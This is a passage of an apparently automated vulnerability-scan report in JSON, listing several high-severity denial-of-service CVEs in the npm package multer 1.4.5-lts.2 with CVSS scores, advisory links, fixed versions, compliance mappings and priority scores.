potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-47935", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-401" ] }, "raw": { "VulnerabilityID": "CVE-2025-47935", "VendorIDs": [ "GHSA-44fp-w29j-9vj5" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b", "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-401" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/pull/1120", "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" ], "PublishedDate": "2025-05-19T20:15:25.863Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.498533333333334, "epss": 0.00177, "epss_percentile": 0.38785, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00708, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9a2891a28bad4ab6", "ruleId": "CVE-2025-47944", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Multer vulnerable to Denial of Service from maliciously crafted requests", "title": "CVE-2025-47944", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-47944", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-248" ] }, "raw": { "VulnerabilityID": "CVE-2025-47944", "VendorIDs": [ "GHSA-4pg4-qvpc-4q3h" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598", "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/issues/1176", "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" ], "PublishedDate": "2025-05-19T20:15:26.007Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.371600000000004, "epss": 0.00041, "epss_percentile": 0.12343, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00164, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d58f5341093c2113", "ruleId": "CVE-2025-48997", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "multer: Multer vulnerable to Denial of Service via unhandled exception", "title": "CVE-2025-48997", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-48997", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-248" ] }, "raw": { "VulnerabilityID": "CVE-2025-48997", "VendorIDs": [ "GHSA-g5hg-p3ph-g8qg" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac", "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48997", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", "https://github.com/expressjs/multer/issues/1233", "https://github.com/expressjs/multer/pull/1256", "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", "https://www.cve.org/CVERecord?id=CVE-2025-48997" ], "PublishedDate": "2025-06-03T19:15:39.577Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.565733333333334, "epss": 0.00249, "epss_percentile": 0.48135, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00996, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "87e4175cbe5a176c", "ruleId": "CVE-2025-7338", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "multer: Multer Denial of Service", "title": "CVE-2025-7338", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-7338", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-248" ] }, "raw": { "VulnerabilityID": "CVE-2025-7338", "VendorIDs": [ "GHSA-fjgf-rc76-4x9p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782", "Title": "multer: Multer Denial of Service", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-7338", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", "https://www.cve.org/CVERecord?id=CVE-2025-7338" ], "PublishedDate": "2025-07-17T16:15:35.227Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.371600000000004, "epss": 0.00041, "epss_percentile": 0.12343, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00164, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2affafc067aeae6e", "ruleId": "CVE-2026-2359", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "multer: Multer: Denial of Service via dropped file upload connections", "title": "CVE-2026-2359", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-2359", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-772" ] }, "raw": { "VulnerabilityID": "CVE-2026-2359", "VendorIDs": [ "GHSA-v52c-386h-88mc" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd", "Title": "multer: Multer: Denial of Service via dropped file upload connections", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-772" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2359", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", "https://www.cve.org/CVERecord?id=CVE-2026-2359" ], "PublishedDate": "2026-02-27T16:16:25.467Z", "LastModifiedDate": "2026-03-19T17:28:16.05Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.351066666666668, "epss": 0.00019, "epss_percentile": 0.05291, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00076, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "80d0e617807f9c3a", "ruleId": "CVE-2026-3304", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "multer: Multer: Denial of Service via malformed requests", "title": "CVE-2026-3304", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-3304", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-459" ] }, "raw": { "VulnerabilityID": "CVE-2026-3304", "VendorIDs": [ "GHSA-xf7r-hgr6-v32p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-459" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3304", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", "https://www.cve.org/CVERecord?id=CVE-2026-3304" ], "PublishedDate": "2026-02-27T16:16:26.38Z", "LastModifiedDate": "2026-03-19T17:28:33.81Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.351066666666668, "epss": 0.00019, "epss_percentile": 0.05291, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00076, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "19ed6f114225796d", "ruleId": "CVE-2026-3520", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "multer: Multer: Denial of Service via malformed requests", "title": "CVE-2026-3520", "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-3520", "references": [], "tags": [ "vulnerability", "pkg:multer@1.4.5-lts.2" ], "risk": { "cwe": [ "CWE-674" ] }, "raw": { "VulnerabilityID": "CVE-2026-3520", "VendorIDs": [ "GHSA-5528-5vmv-3xc2" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3520", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", "https://www.cve.org/CVERecord?id=CVE-2026-3520" ], "PublishedDate": "2026-03-04T17:16:22.61Z", "LastModifiedDate": "2026-03-09T18:03:23.1Z" }, "context": { "sbom": { "name": "multer", "version": "1.4.5-lts.2", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": 